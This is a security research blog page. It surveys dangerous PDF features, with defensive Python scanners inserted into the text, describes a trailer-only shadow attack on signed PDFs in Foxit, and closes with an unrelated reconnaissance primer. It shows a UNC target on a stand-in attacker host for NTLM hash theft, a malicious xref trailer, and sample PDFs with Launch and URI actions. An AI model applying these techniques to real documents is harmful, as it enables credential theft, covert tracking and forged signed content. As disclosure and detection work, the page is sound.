31 may 2023

Insecure Features In PDFs

In 2019, we published attacks on PDF Signatures and PDF Encryption. During our research, and while studying the related work, we found many blog posts, talks, and papers focusing on malicious PDFs causing some damage. However, there was no systematic analysis of all potentially dangerous features supported by PDFs, only isolated exploits and attack concepts.

We decided to fill this gap and systematize the possibilities of using legitimate PDF features to do bad stuff. We define four attack categories: Denial of Service, Information Disclosure, Data Manipulation, and Code Execution.

Our evaluation reveals that 26 of 28 popular PDF processing applications are vulnerable to at least one attack. You can download all malicious PDFs here. You can also find more technical details in our NDSS'21 paper.

This is joint work of Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

Dangerous Paths: Overview

To identify attack vectors, we systematically surveyed which potentially dangerous features exist in the PDF specification. We created a comprehensive list with all PDF Actions that can be called. This list contains 18 different actions that we carefully studied.
 
 
We selected eight actions – the ones that directly or indirectly allow access to a file handle and may therefore be abused for dangerous features such as URL invocation or writing to files. Having a list of security-sensitive actions, we proceeded by investigating all objects and related events that can trigger these actions.

We identified four PDF objects that allow calling arbitrary actions (Page, Annotation, Field, and Catalog). Most objects offer multiple alternatives for this purpose. For example, the Catalog object defines the OpenAction entry and the additional-actions (AA) events. Each event can launch any sequence of PDF actions, for example, Launch, Thread, etc. JavaScript actions can be embedded within documents, which opens a new area for attacks: for example, new annotations can be created that have actions which once again lead to accessing file handles.

Denial of Service

The goal of the denial of service class of attacks is to force the processing PDF application to consume all available resources (i.e., computing time or memory), or to crash, when opening a specially crafted PDF document. We identified two variants: Infinite Loop and Deflate Bomb.

Infinite Loop

This variant induces an endless loop, causing the program execution to get stuck. The PDF standard allows various elements of the document structure to refer to themselves or to other elements of the same type.

  • Action loop: PDF actions allow specifying a Next action to be performed, which can result in "action cycles".
  • ObjStm loop: Object streams may extend other object streams, which allows crafting a document with cycles.
  • Outline loop: PDF documents may contain an outline. Its entries, however, can refer to themselves or to each other.
  • Calculations: PDF defines "Type 4" calculator functions, for example, to transform colors. Processing hard-to-solve mathematical formulas may lead to high CPU demand.
  • JavaScript: Finally, if the PDF application processes scripts within documents, infinite loops can be induced.
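As an added example (not code from the original post or the paper's artifacts), the following Python scanner shows how a defender can check the two things the overview and the action-loop item describe: which security-sensitive actions a document triggers from the Catalog's OpenAction and AA entries, and whether the /Next chain of those actions forms a cycle. The object parser, the list of action names and the two embedded sample documents are assumptions made for this illustration; it handles only plain-text (uncompressed) PDFs with direct references.

```python
"""Find security-sensitive PDF actions reachable from the Catalog and detect /Next cycles.

Added example: a minimal scanner for plain-text (uncompressed) PDFs. Object streams,
encryption and /Next arrays stored in other objects are out of scope.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Action types the post singles out because they reach a file handle or a URL.
SENSITIVE_ACTIONS = {"Launch", "URI", "SubmitForm", "ImportData",
                     "GoToR", "GoToE", "JavaScript", "Thread"}

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.DOTALL)
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R")


def parse_objects(pdf: bytes) -> Dict[int, bytes]:
    """Map object number -> raw object body."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def refs_after_key(body: bytes, key: bytes) -> List[int]:
    """Object numbers referenced by '/key 7 0 R' or '/key [7 0 R 8 0 R]'."""
    m = re.search(rb"/" + key + rb"\s*(\[[^\]]*\]|\d+\s+\d+\s+R)", body)
    return [int(r) for r in REF_RE.findall(m.group(1))] if m else []


def action_type(body: bytes) -> Optional[str]:
    """The /S name of an action dictionary, e.g. 'URI' for '/S /URI'."""
    m = re.search(rb"/S\s*/([A-Za-z]+)", body)
    return m.group(1).decode() if m else None


def entry_points(objects: Dict[int, bytes]) -> List[int]:
    """Actions the Catalog triggers on its own: /OpenAction and every /AA event."""
    starts: List[int] = []
    for body in objects.values():
        if not re.search(rb"/Type\s*/Catalog", body):
            continue
        starts += refs_after_key(body, b"OpenAction")
        aa = re.search(rb"/AA\s*<<(.*?)>>", body, re.DOTALL)
        if aa:
            starts += [int(r) for r in REF_RE.findall(aa.group(1))]
    return starts


def analyse(pdf: bytes) -> Tuple[List[str], bool]:
    """Return (sorted sensitive action types reached, True if a /Next cycle exists)."""
    objects = parse_objects(pdf)
    found: List[str] = []
    visited: Set[int] = set()
    cycle = False

    def walk(num: int, path: List[int]) -> None:
        nonlocal cycle
        if num in path:            # the /Next chain returned to an action on the stack
            cycle = True
            return
        if num in visited or num not in objects:
            return
        visited.add(num)
        kind = action_type(objects[num])
        if kind in SENSITIVE_ACTIONS and kind not in found:
            found.append(kind)
        for nxt in refs_after_key(objects[num], b"Next"):
            walk(nxt, path + [num])

    for start in entry_points(objects):
        walk(start, [])
    return sorted(found), cycle


# Constructed sample: OpenAction -> URI action whose /Next loops back via a Launch action;
# the /AA /WC (will-close) event runs a JavaScript action. All targets are placeholders.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AA << /WC 6 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R >>
endobj
4 0 obj
<< /S /URI /URI (http://tracker.example/open) /Next 5 0 R >>
endobj
5 0 obj
<< /S /Launch /F (example.exe) /Next 4 0 R >>
endobj
6 0 obj
<< /S /JavaScript /JS (app.alert(1)) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Constructed benign document: OpenAction is a plain in-document GoTo.
BENIGN_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R >>
endobj
4 0 obj
<< /S /GoTo /D [3 0 R /Fit] >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print(analyse(SAMPLE_PDF))   # (['JavaScript', 'Launch', 'URI'], True)
    print(analyse(BENIGN_PDF))   # ([], False)
```

The cycle check keeps the current DFS path rather than only a visited set, so a /Next that points back to any action already on the chain is reported even when the loop does not return to the entry point itself.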

Deflate Bomb

Data amplification attacks based on malicious zip archives are well-known. The first publicly documented DoS attack using a "zip bomb" was conducted in 1996 against a Fidonet BBS administrator. However, not only zip files but also stream objects within PDF documents can be compressed using various algorithms such as Deflate to reduce the overall file size. 
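The check a PDF processor needs against this is bounded decompression: inflate with a byte cap and look at the amplification ratio instead of trusting the stream. The following Python scanner is an added example (not code from the original post). It constructs its own sample file with one normal content stream and one 16 MiB stream of zeros; the caps MAX_OUTPUT and MAX_RATIO are assumed values, and the stream regex does not handle nested dictionaries.

```python
"""Measure the amplification of FlateDecode streams without inflating them unboundedly.

Added example: a reader that inflates every stream fully is exactly what a deflate bomb
exploits; this scanner stops at a byte cap and reports the compression ratio instead.
"""
import re
import zlib
from typing import Dict, Iterator, List, Tuple

# A stream object: its dictionary (no nested dictionaries in this example), then the data.
STREAM_RE = re.compile(rb"<<([^>]*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

# Caps chosen for this example; a production scanner would tune them per deployment.
MAX_OUTPUT = 50 * 1024 * 1024   # never produce more than 50 MiB from one stream
MAX_RATIO = 100.0               # treat more than 100x expansion as suspicious


def inflate_bounded(data: bytes, limit: int) -> Tuple[int, bool]:
    """Inflate at most `limit` bytes. Returns (bytes produced, stopped before end of stream)."""
    d = zlib.decompressobj()
    produced = len(d.decompress(data, limit))          # max_length caps the output size
    while d.unconsumed_tail and produced < limit:
        produced += len(d.decompress(d.unconsumed_tail, limit - produced))
    return produced, not d.eof


def flate_streams(pdf: bytes) -> Iterator[bytes]:
    """Yield the raw data of every stream whose dictionary names /FlateDecode."""
    for m in STREAM_RE.finditer(pdf):
        if b"/FlateDecode" in m.group(1):
            yield m.group(2)


def scan_for_bombs(pdf: bytes, max_output: int = MAX_OUTPUT,
                   max_ratio: float = MAX_RATIO) -> List[Dict[str, object]]:
    """One report per FlateDecode stream: sizes, ratio, and whether it looks like a bomb."""
    reports = []
    for raw in flate_streams(pdf):
        produced, truncated = inflate_bounded(raw, max_output)
        ratio = produced / max(len(raw), 1)
        reports.append({
            "compressed": len(raw),
            "inflated": produced,
            "ratio": round(ratio, 1),
            # hitting the cap is suspicious on its own: we never saw the end of the stream
            "suspicious": truncated or ratio > max_ratio,
        })
    return reports


def stream_object(num: int, data: bytes) -> bytes:
    """Serialise an already-deflated payload as a FlateDecode stream object (constructed)."""
    return (b"%d 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % (num, len(data))
            + data + b"\nendstream\nendobj\n")


BOMB_SIZE = 16 * 1024 * 1024                              # 16 MiB of zeros -> a few KiB
BOMB_STREAM = zlib.compress(b"\0" * BOMB_SIZE, 9)
SMALL_STREAM = zlib.compress(b"BT /F1 12 Tf (Hello, world) Tj ET", 9)

# Constructed sample: one ordinary content stream and one highly repetitive stream.
SAMPLE_PDF = (b"%PDF-1.7\n"
              + stream_object(4, SMALL_STREAM)
              + stream_object(5, BOMB_STREAM)
              + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for report in scan_for_bombs(SAMPLE_PDF):
        print(report)
```

Because zlib's decompressobj accepts a max_length, the cap is enforced while inflating rather than after the fact; a stream that is cut off at the cap is reported as suspicious even before its ratio is known.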

Information Disclosure

The goal of this class of attacks is to track the usage of a document by silently invoking a connection to the attacker's server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker.

URL Invocation

PDF documents that silently "phone home" should be considered privacy-invasive. They can be used, for example, to deanonymize reviewers, journalists, or activists behind a shared mailbox. The attack's goal is to open a backchannel to an attacker-controlled server once the PDF file is opened by the victim.

The possibility of malicious URI resolving in PDF documents has been introduced by Hamon [1] who gave an evaluation for URI and SubmitForm actions in Acrobat Reader. We extend their analysis to all standard PDF features that allow opening a URL, such as ImportData, Launch, GoToR, and JavaScript.

Form Data Leakage

Documents can contain forms to be filled out by the user – a feature introduced with PDF version 1.2 in 1996 and used on a daily basis for routine office tasks, such as travel authorization or vacation requests. The idea of this attack is as follows: the victim downloads a form – a PDF document which contains form fields – from an attacker-controlled source and fills it out on the screen, for example, in order to print it. The form is manipulated by the attacker in such a way that it silently sends the input data to the attacker's server.

Local File Leakage

The PDF standard defines various methods to embed external files into a document or otherwise access files on the host's file system, as documented below.

  • External streams: Documents can contain stream objects (e.g., images) to be included from external files on disk.
  • Reference XObjects: This feature allows a document to import content from another (external) PDF document.
  • Open Prepress Interface: Before printing a document, local files can be defined as low-resolution placeholders.
  • Forms Data Format (FDF): Interactive form data can be stored in, and auto-imported from, external FDF files.
  • JavaScript functions: The Adobe JavaScript reference enables documents to read data from or import local files.

If a malicious document managed to first read files from the victim's disk and then send them back to the attacker, such behavior would arguably be critical.

Credential Theft

In 1997, Aaron Spangler posted a vulnerability in Windows NT on the Bugtraq mailing list [2]: Any client program can trigger a connection to a rogue SMB server. If the server requests authentication, Windows will automatically try to log in with a hash of the user's credentials. Such captured NTLM hashes allow for efficient offline cracking and can be re-used by applying pass-the-hash or relay attacks to authenticate under the user's identity. In April 2018, Check Point Research [3] showed that similar attacks can be performed with malicious PDF files. They found that the target of GoToR and GoToE actions can be set to \\attacker.com\dummyfile, thereby leaking credentials in the form of NTLM hashes.

Data Manipulation

This attack class deals with the capabilities of malicious documents to silently modify form data, to write to local files on the host's file system, or to show a different content based on the application that is used to open the document.

Form Modification

The idea of this attack is as follows: similar to Form Data Leakage attacks, the victim obtains a harmless-looking PDF document from an attacker-controlled source, for example, a remittance slip or a tax form. The goal of the attacker is to dynamically, and without the victim's knowledge, manipulate form field data.

File Write Access

The PDF standard enables documents to submit form data to external web servers. Technically, the web server's URL is defined using a PDF File Specification, and a file specification can equally denote a file on disk. Implementations may resolve this ambiguity in the standard in such a way that they enable documents to submit PDF form data to a local file, thereby writing to this file.
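The targets of these actions can be triaged mechanically, which covers URL Invocation, Form Data Leakage, Credential Theft and File Write Access at once. The Python code below is an added example (not part of the original post): it extracts the /URI or /F target of each URI, SubmitForm, ImportData, GoToR, GoToE and Launch action, decodes the PDF literal string (so a string written with doubled backslashes decodes to a UNC path), and classifies the target as remote URL, UNC path, absolute local file or relative file. The sample objects, the hostnames (reserved .example TLD) and the risk labels are constructed for this illustration.

```python
"""Classify where URL- and file-oriented PDF actions point, and what each target implies.

Added example: looks at action targets rather than structure: remote URLs (URL invocation,
form data leakage), UNC paths (NTLM credential theft), local or relative files (read via
ImportData, write via SubmitForm), and Launch targets.
"""
import re
from typing import Dict, List

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*(.*?)\s*endobj", re.DOTALL)
ACTION_RE = re.compile(rb"/S\s*/(URI|SubmitForm|ImportData|GoToR|GoToE|Launch)\b")
# '/URI (...)' or '/F (...)' literal strings; backslash escapes handled, nested parens not.
TARGET_RE = {
    "URI": re.compile(rb"/URI\s*\(((?:\\.|[^\\()])*)\)", re.DOTALL),
    "F":   re.compile(rb"/F\s*\(((?:\\.|[^\\()])*)\)", re.DOTALL),
}
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}


def unescape(literal: bytes) -> str:
    """Decode a PDF literal string body: a doubled backslash is one backslash, \\( is (."""
    out, i = [], 0
    while i < len(literal):
        if literal[i:i + 1] == b"\\" and i + 1 < len(literal):
            nxt = literal[i + 1:i + 2]
            out.append(ESCAPES.get(nxt, nxt))
            i += 2
        else:
            out.append(literal[i:i + 1])
            i += 1
    return b"".join(out).decode("latin-1")


def classify(target: str) -> str:
    """Coarse target class: unc-path, remote-url, local-file or relative-file."""
    low = target.lower()
    if low.startswith("\\\\") or low.startswith("smb://"):
        return "unc-path"                    # an SMB share: the client may send NTLM
    if re.match(r"^(https?|ftp)://", low):
        return "remote-url"
    if low.startswith("file:") or re.match(r"^([a-z]:[\\/]|/)", low):
        return "local-file"
    return "relative-file"


def risk(action: str, kind: str) -> str:
    """Map (action, target class) to the attack class from the post."""
    if kind == "unc-path":
        return "credential-theft"
    if action == "Launch":
        return "code-execution"
    if action == "SubmitForm":
        return "form-data-leakage" if kind == "remote-url" else "file-write"
    if action == "ImportData":
        return "url-invocation" if kind == "remote-url" else "local-file-read"
    return "url-invocation" if kind == "remote-url" else "local-file-access"


def find_targets(pdf: bytes) -> List[Dict[str, str]]:
    """One finding per object that carries a target-bearing action."""
    findings = []
    for m in OBJ_RE.finditer(pdf):
        body = m.group(2)
        act = ACTION_RE.search(body)
        if not act:
            continue
        action = act.group(1).decode()
        key = "URI" if action == "URI" else "F"     # /F also covers /Win << /F ... >>
        tgt = TARGET_RE[key].search(body)
        if not tgt:
            continue
        target = unescape(tgt.group(1))
        kind = classify(target)
        findings.append({"obj": m.group(1).decode(), "action": action,
                         "target": target, "kind": kind, "risk": risk(action, kind)})
    return findings


# Constructed sample objects (hostnames use the reserved .example TLD; paths are placeholders).
SAMPLE_PDF = rb"""%PDF-1.7
4 0 obj
<< /S /URI /URI (http://tracker.example/beacon) >>
endobj
5 0 obj
<< /S /SubmitForm /F (https://collector.example/submit) /Flags 4 >>
endobj
6 0 obj
<< /S /SubmitForm /F (C:\\Users\\Public\\out.fdf) >>
endobj
7 0 obj
<< /S /GoToR /F (\\\\files.example\\share\\doc.pdf) /D [0 /Fit] >>
endobj
8 0 obj
<< /S /ImportData /F (data.fdf) >>
endobj
9 0 obj
<< /S /Launch /F (example.exe) >>
endobj
%%EOF
"""

if __name__ == "__main__":
    for f in find_targets(SAMPLE_PDF):
        print(f"{f['obj']:>3} {f['action']:<11} {f['kind']:<13} {f['risk']:<18} {f['target']}")
```

The literal-string decoding matters: a UNC target is stored as four backslashes followed by the host name, and a scanner that matches the raw bytes against the expected two-backslash prefix will miss it.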
 

Content Masking

The goal of this attack is to craft a document that renders differently, depending on the applied PDF interpreter. This can be used, for example, to show different content to different reviewers, to trick content filters (AI-based machines as well as human content moderators), plagiarism detection software, or search engines, which index a different text than the one shown to users when opening the document.

  • Stream confusion: It is unclear how content streams are parsed if their Length value does not match the offset of the endstream marker, or if syntax errors are introduced.
  • Object confusion: An object can overlay another object. The second object may not be processed if it has a duplicate object number, if it is not listed in the XRef table, or if other structural syntax errors are introduced.
  • Document confusion: A PDF file can contain yet another document (e.g., as embedded file), multiple XRef tables, etc., which results in ambiguities on the structural level.
  • PDF confusion: Objects before the PDF header or after an EOF marker may be processed by implementations, introducing ambiguities in the outer document structure.
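A defender-side parser can surface the first three of these ambiguities directly. The Python checks below are an added example (not the paper's tooling): they compare each stream's declared /Length with the bytes actually present before endstream, list object numbers that are defined more than once, and count bytes before the %PDF header or after the last %%EOF. The sample document is constructed for the illustration and kept in plain text.

```python
"""Structural consistency checks for the content masking ambiguities listed above.

Added example: reports stream /Length mismatches, duplicate object numbers, and bytes
outside the %PDF header / last %%EOF, i.e. the places where two parsers may disagree.
"""
import re
from typing import Dict, List, Tuple

OBJ_HDR_RE = re.compile(rb"(?m)^(\d+)\s+\d+\s+obj\b")
STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")     # 'stream' but not 'endstream'
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(\s+\d+\s+R)?")


def stream_length_mismatches(pdf: bytes) -> List[Tuple[int, int, int]]:
    """(object number, declared /Length, actual bytes before endstream) for every mismatch."""
    out = []
    for m in STREAM_START_RE.finditer(pdf):
        start = m.end()
        end = pdf.find(b"endstream", start)
        if end < 0:
            continue
        # The EOL before 'endstream' is not stream data; binary data ending in 0x0a would
        # need the declared length to disambiguate, which is exactly the ambiguity at issue.
        actual = len(pdf[start:end].rstrip(b"\r\n"))
        head = pdf[max(0, m.start() - 300):m.start()]      # dictionary preceding 'stream'
        lengths = LENGTH_RE.findall(head)
        objs = OBJ_HDR_RE.findall(head)
        if not lengths or not objs or lengths[-1][1]:     # missing or indirect /Length
            continue
        declared = int(lengths[-1][0])
        if declared != actual:
            out.append((int(objs[-1]), declared, actual))
    return out


def duplicate_object_numbers(pdf: bytes) -> List[int]:
    """Object numbers defined more than once (a later copy may shadow the first)."""
    seen: Dict[int, int] = {}
    for n in OBJ_HDR_RE.findall(pdf):
        seen[int(n)] = seen.get(int(n), 0) + 1
    return sorted(n for n, c in seen.items() if c > 1)


def bytes_outside_document(pdf: bytes) -> Tuple[int, int]:
    """(bytes before the %PDF- header, non-whitespace bytes after the last %%EOF)."""
    hdr = pdf.find(b"%PDF-")
    leading = hdr if hdr > 0 else 0
    eof = pdf.rfind(b"%%EOF")
    trailing = len(pdf[eof + 5:].strip()) if eof >= 0 else 0
    return leading, trailing


def check_masking(pdf: bytes) -> Dict[str, object]:
    """Bundle the three checks into one report."""
    leading, trailing = bytes_outside_document(pdf)
    return {
        "length_mismatch": stream_length_mismatches(pdf),
        "duplicate_objects": duplicate_object_numbers(pdf),
        "leading_bytes": leading,
        "trailing_bytes": trailing,
    }


def content_obj(num: int, text: bytes, declared: int) -> bytes:
    """Serialise a content stream object with an explicitly chosen /Length (constructed)."""
    return (b"%d 0 obj\n<< /Length %d >>\nstream\n" % (num, declared)
            + text + b"\nendstream\nendobj\n")


HONEST = b"BT (Honest) Tj ET"
HIDDEN = b"BT (Hidden text) Tj ET"

# Constructed sample: junk before the header, object 4 defined twice (the second copy with
# a wrong /Length), and leftover bytes after the final %%EOF.
SAMPLE_PDF = (b"JUNK-BEFORE-HEADER\n%PDF-1.7\n"
              + b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
              + content_obj(4, HONEST, len(HONEST))
              + content_obj(4, HIDDEN, 5)
              + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
              + b"HIDDEN-TRAILING-OBJECT")

if __name__ == "__main__":
    print(check_masking(SAMPLE_PDF))
```

None of these findings is a vulnerability by itself (incremental updates legitimately produce multiple xref tables, and some writers emit sloppy lengths), but each is a point where two readers may choose different content, so they are worth reporting to whoever decides what the document "really" says.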

Code Execution

The goal of this attack is to execute attacker-controlled code. This can be achieved by silently launching an executable file, embedded within the document, to infect the host with malware. The PDF specification defines the Launch action, which allows documents to launch arbitrary applications. The file to be launched can either be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself.

Evaluation

Out of 28 tested applications, 26 are vulnerable to at least one attack.

Authors of this Post

Dominik Noss
Christian Mainka

Sources

[1] V. Hamon. "Malicious URI resolving in PDF documents". In: Journal of Computer Virology and Hacking Techniques 9.2 (2013), pp. 65–76.

[2] Aaron Spangler. WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4). https://insecure.org/sploits/winnt.automatic.authentication.html. Mar. 1997.

[3] Check Point Research. NTLM Credentials Theft via PDF Files. https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/. 2018.




30 may 2023

Shadow Attacks … The Smallest Attack Vector Ever

In July 2020, we introduced a novel attack class called Shadow Attacks. In our recent research, we discovered a new variant of the attack which relies only on an Incremental Update containing a malicious trailer.
A proof-of-concept exploit working on Foxit (Version: 11.0.1.49938) can be downloaded here.

The story so far ...

Shadow attacks are attacks bypassing the integrity protection of digitally signed PDF documents. The attacks abuse two legitimate features in PDF documents which we briefly explain.

Hiding Content

In PDFs, there are multiple techniques to hide content that is not displayed when the document is opened. We, as attackers, usually hide malicious objects without referencing them in the xref section.

Incremental Updates

New content can be appended to a signed PDF document. The digital signature in PDFs protects a specific range of bytes. Any appended content does not break the signature verification since it is outside this range. As a result, a new Incremental Update does not violate the cryptographic verification of the digital signature.
But Incremental Updates are quite dangerous, since they may completely change the displayed content of the document. In 2019, we showed different techniques based on Incremental Updates – the Incremental Saving Attacks.
As a countermeasure, most vendors warn if additional content is added after signing the document. BUT … not always!!!
 
There are meaningful use cases where Incremental Updates in digitally signed documents are allowed. For instance, contracts are often signed by multiple parties, and each new signature is applied via an additional Incremental Update.
Also, PAdES defines Incremental Updates as part of the long-term validation of digitally signed PDFs.
In summary, Incremental Updates are painful from a security perspective. Currently, vendors are trying to estimate whether an Incremental Update is malicious or not by analyzing its content.

Shadow Attacks

Shadow attacks, in general, deceive PDF applications into treating an Incremental Update as not malicious. This can be done by providing an Incremental Update with minimal content.
In 2020, we estimated that appending an xref section and a trailer is sufficient to bypass the detection mechanisms of popular applications such as Adobe Reader and Foxit Reader.

Trailer-based Shadow Attack

Three months ago, we tried to reduce the content of the malicious Incremental Update even further. Our idea was to use only a malicious trailer and still change the content of the entire document when it is opened. Let's see how this can be done.


The Signer's view on the document

If a signer gets the document depicted on the left side, he or she sees the content "Sign the document to get a reward".
The document contains hidden content, depicted as red text: the 4 0 obj containing the text "You are fired. Get out immediately" and an xref section pointing to that object. However, the trailer references another xref section, see (1) and (2). Thus, the red text is never shown.
From the signer's perspective, there is no possibility to detect the hidden content by opening and reviewing the document.
As a result, the signer, for example the company director, signs the document.

The Victim's view on the document

We assume that the attacker receives the signed document and manipulates it.
The attacker appends only a trailer that points to the hidden malicious xref section (the red one). When the victim opens the document, the content "You are fired. Get out immediately" is shown.
However, the digital signature validation does not throw any warning since … well … what could go wrong if only a trailer is appended?
 

Honest vs. Malicious Trailer

There is only one small difference between the honest and the malicious trailer: the byte position of the xref section given in /Prev. In the malicious trailer, it points to the hidden xref section.

Honest trailer:

trailer
<<
/Size 23
/Prev 18735
/Root 13 0 R
>>

Malicious trailer:

trailer
<<
/Size 23
/Prev 19192
/Root 13 0 R
>>
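The difference above is detectable if a validator compares the xref chain of the signed revision with the chain of the final file. The Python code below is an added example (neither Foxit's fix nor the authors' exploit): it builds a constructed document in the layout of the figure (an honest xref section, a dormant hidden xref section that maps object 3 to a page showing the hidden text, a signed %%EOF, and then an appended trailer whose /Prev points at the hidden section) and flags the update because it is trailer-only and because it activates an xref section that was present but unreferenced in the signed bytes. The signed byte range (taken here as ending at the first %%EOF, where a real validator would use the signature's /ByteRange) and the startxref in the appended part are assumptions.

```python
"""Detect an appended update that re-activates a dormant xref section.

Added example for the trailer-based shadow attack: compare the xref chain a reader follows
for the signed revision with the chain it follows for the whole file.
"""
import re
from typing import Dict, Optional, Set, Tuple

TRAILER_RE = re.compile(rb"trailer\s*<<(.*?)>>", re.DOTALL)
STARTXREF_RE = re.compile(rb"startxref\s+(\d+)")
XREF_RE = re.compile(rb"(?m)^xref\r?\n")


def prev_of(trailer_dict: bytes) -> Optional[int]:
    """The /Prev offset of a trailer dictionary, if any."""
    m = re.search(rb"/Prev\s+(\d+)", trailer_dict)
    return int(m.group(1)) if m else None


def xref_chain(pdf: bytes, end: int) -> Set[int]:
    """Offsets of the xref sections a reader follows for the file truncated at `end`:
    the last startxref, the last trailer's /Prev, and every /Prev reachable from there."""
    region = pdf[:end]
    stack = []
    sx = STARTXREF_RE.findall(region)
    if sx:
        stack.append(int(sx[-1]))
    trailers = TRAILER_RE.findall(region)
    if trailers and prev_of(trailers[-1]) is not None:
        stack.append(prev_of(trailers[-1]))
    seen: Set[int] = set()
    while stack:
        off = stack.pop()
        if off in seen or off >= end:
            continue
        seen.add(off)
        nxt = TRAILER_RE.search(region, off)      # the trailer belonging to this section
        if nxt and prev_of(nxt.group(1)) is not None:
            stack.append(prev_of(nxt.group(1)))
    return seen


def analyse_update(pdf: bytes, signed_end: int) -> Dict[str, object]:
    """Describe what the bytes appended after the signed range change about the xref chain."""
    appended = pdf[signed_end:]
    all_xrefs = {m.start() for m in XREF_RE.finditer(pdf[:signed_end])}
    dormant = all_xrefs - xref_chain(pdf, signed_end)       # present but never referenced
    activated = xref_chain(pdf, len(pdf)) & dormant
    return {
        "appended_bytes": len(appended),
        "trailer_only": b"trailer" in appended
                        and not re.search(rb"(?m)\bobj\b|^xref\b", appended),
        "activates_dormant_xref": sorted(activated),
    }


def build_sample() -> Tuple[bytes, int, Dict[str, int]]:
    """Constructed document mirroring the figure: honest page text, a dormant xref that
    swaps object 3 for a page showing the hidden text, then the appended attacker trailer."""
    buf = bytearray(b"%PDF-1.7\n")
    offs: Dict[object, int] = {}

    def add(num: int, body: bytes, key=None) -> None:
        offs[key or num] = len(buf)
        buf.extend(b"%d 0 obj\n" % num + body + b"\nendobj\n")

    def content(text: bytes) -> bytes:
        return b"<< /Length %d >>\nstream\n" % len(text) + text + b"\nendstream"

    add(1, b"<< /Type /Catalog /Pages 2 0 R >>")
    add(2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>")
    add(3, b"<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>")
    add(4, content(b"BT (Sign the document to get a reward) Tj ET"))
    add(5, content(b"BT (You are fired. Get out immediately) Tj ET"))
    add(3, b"<< /Type /Page /Parent 2 0 R /Contents 5 0 R >>", key="3-hidden")

    def xref(page_off: int) -> bytes:
        rows = [offs[1], offs[2], page_off, offs[4], offs[5]]
        return (b"xref\n0 6\n0000000000 65535 f \n"
                + b"".join(b"%010d 00000 n \n" % o for o in rows)
                + b"trailer\n<< /Size 6 /Root 1 0 R >>\n")

    honest = len(buf); buf.extend(xref(offs[3]))
    hidden = len(buf); buf.extend(xref(offs["3-hidden"]))   # never referenced when signed
    buf.extend(b"trailer\n<< /Size 6 /Prev %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
               % (honest, honest))
    signed_end = len(buf)          # assumption: the signature's /ByteRange ends here
    buf.extend(b"trailer\n<< /Size 6 /Prev %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
               % (hidden, hidden))
    return bytes(buf), signed_end, {"honest": honest, "hidden": hidden}


if __name__ == "__main__":
    pdf, signed_end, offsets = build_sample()
    print(offsets, analyse_update(pdf, signed_end))
```

The decisive signal is not the size of the update but that the final chain reaches an xref section the signed chain never did: a legitimate counter-signature or PAdES update adds sections after the signed range, whereas this update only redirects to bytes that were already inside it.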
 
 



Impact and Exploit

We successfully applied the new attack to Foxit Reader (Version: 11.0.1.49938). We promptly reported the vulnerability and provided a Proof-of-Concept (PoC) exploit; the issue was assigned CVE-2021-40326.
Foxit acknowledged the attack and published a security fix with the new version Foxit Reader 11.1.
 
We are not aware of any further implementations vulnerable to this attack.
If you think that your application might be vulnerable to the attack, then just download the exploit and test it on your own.
 

Authors of this post

Vladislav Mladenov

Simon Rohlmann

Christian Mainka

RECONNAISSANCE IN ETHICAL HACKING

What is reconnaissance in ethical hacking?
This is the primary phase of hacking, where the hacker tries to collect as much information as possible about the target. It includes identifying the target's IP address range, network, domain, mail server records, etc.

There are two types:
Active Reconnaissance
Passive Reconnaissance

1. Active Reconnaissance: This is the process in which we directly interact with the computer system to gain information. This information can be relevant and accurate, but there is a risk of getting detected if you perform active reconnaissance without permission. If you are detected, the administration will take severe action against you; it may even mean jail!

2. Passive Reconnaissance: In this process you are not directly connected to the computer system. It is used to gather essential information without ever interacting with the target system.
